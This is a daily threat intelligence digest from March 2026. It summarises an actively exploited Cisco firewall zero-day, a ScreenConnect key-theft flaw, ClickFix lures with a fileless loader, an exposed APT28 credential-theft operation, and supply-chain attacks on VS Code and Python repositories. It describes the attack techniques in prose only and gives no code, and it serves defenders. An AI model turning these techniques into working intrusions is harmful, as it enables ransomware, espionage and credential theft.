Cisco zero-day π₯, ScreenConnect key theft π, ClickFix lures π£, APT28 exposure π·πΊ, VSCode attacks βοΈ
Daily Threat Intel Digest - 2026-03-19
π΄ Critical Threats & Active Exploitation
[NEW] Critical Zero-Day in Cisco Firewalls Exploited for Ransomware A critical unauthenticated remote code execution (RCE) vulnerability in Cisco Secure Firewall Management Center (FMC), tracked as CVE-2026-20131 (CVSS 10.0), is being actively exploited in the wild to deploy Interlock ransomware. The flaw stems from an insecure deserialization issue in the web management interface that allows attackers to execute arbitrary code with root privileges without authentication. Exploitation attempts have been detected as early as January 26, 2026, giving threat actors a significant head start. Following successful exploitation, attackers deploy a PowerShell reconnaissance script, followed by custom Remote Access Trojans (RATs) using encrypted WebSocket communications to maintain persistence. Cisco has confirmed no effective workarounds exist, making immediate patching the only viable mitigation for organizations using affected FMC deployments [Cyberpress; GBHackers].
[NEW] ScreenConnect Flaw Enables Machine Key Theft and Session Hijacking ConnectWise has issued a Priority 1 emergency update for ScreenConnect remote desktop software to address a critical authentication bypass vulnerability, CVE-2026-3564 (CVSS 9.0). The flaw allows attackers to extract machine-level cryptographic keys from server configuration files and forge authentication tokens, enabling them to hijack active user sessions without credentials. This vulnerability poses a severe supply chain risk due to ScreenConnect’s widespread use by Managed Service Providers (MSPs) and enterprise IT environments. ConnectWise has released version 26.1, which replaces plaintext key storage with encrypted key management. While cloud-hosted instances are automatically patched, administrators of on-premise deployments must manually update immediately to prevent session hijacking [Cyberpress; GBHackers].
[NEW] LeakNet Ransomware Abuses ClickFix Lures and Fileless Loaders The LeakNet ransomware group has adopted a new attack chain combining “ClickFix” social engineering lures with a fileless Deno loader to infect victims at scale. Attackers compromise legitimate websites to display fake Cloudflare Turnstile verification pages, tricking users into copying and pasting malicious commands into their terminal. This approach bypasses the need to purchase initial access on dark web markets. Once executed, the Deno loader runs entirely in memory, fetching payloads and C2 instructions without writing files to disk, making detection difficult for traditional antivirus. Defenders should monitor for unusual browser-initiated commands and unexpected connections to cloud storage from standard endpoints [Cyberpress].
π― Threat Actor Activity & Campaigns
[NEW] FancyBear Operations Exposed via Server Misconfiguration An operational security failure by the Russian state-sponsored group FancyBear (APT28) has exposed the inner workings of a massive credential theft campaign. Researchers discovered an open directory on a command-and-control server that had been active for over 500 days, revealing a toolkit designed to exploit webmail platforms like Roundcube and SquirrelMail. The exposed logs indicate the group successfully exfiltrated 2,800 emails, stole 240 sets of credentials including 2FA secrets, and harvested 11,500 contacts from European government and military entities, primarily in nations supporting Ukraine. The discovery provides rare visibility into the telemetry and success metrics of a long-running espionage operation [Cyberpress].
[NEW] WaterPlum Deploys “StoatWaffle” in VSCode Supply Chain Attack The North Korea-linked threat group WaterPlum (specifically the “Team 8” or Modilus cluster) is continuing its “Contagious Interview” campaign by distributing a new malware strain dubbed “StoatWaffle.” The attack targets the software supply chain by compromising VS Code development environments. This activity follows a trend of state-sponsored actors abusing trusted developer tools to establish initial access, leveraging the legitimacy of these platforms to bypass security controls [GBHackers].
[UPDATE] ForceMemo Campaign Backdoors Python Repositories via Token Theft
New details have emerged regarding the GlassWorm supply chain attack (first reported March 14), now tracked as the “ForceMemo” campaign. Threat actors are using previously stolen GitHub authentication tokensβharvested via malicious VS Code and Cursor extensionsβto force-push malicious code into hundreds of Python repositories. The injected code, often appended to setup.py files, reaches out to the Solana blockchain for command-and-control (C2) rather than traditional servers, a technique designed to evade network detection. Security teams should check for committer emails set to “null” and anomalous connections to Solana endpoints in their development environments [Cyberpress].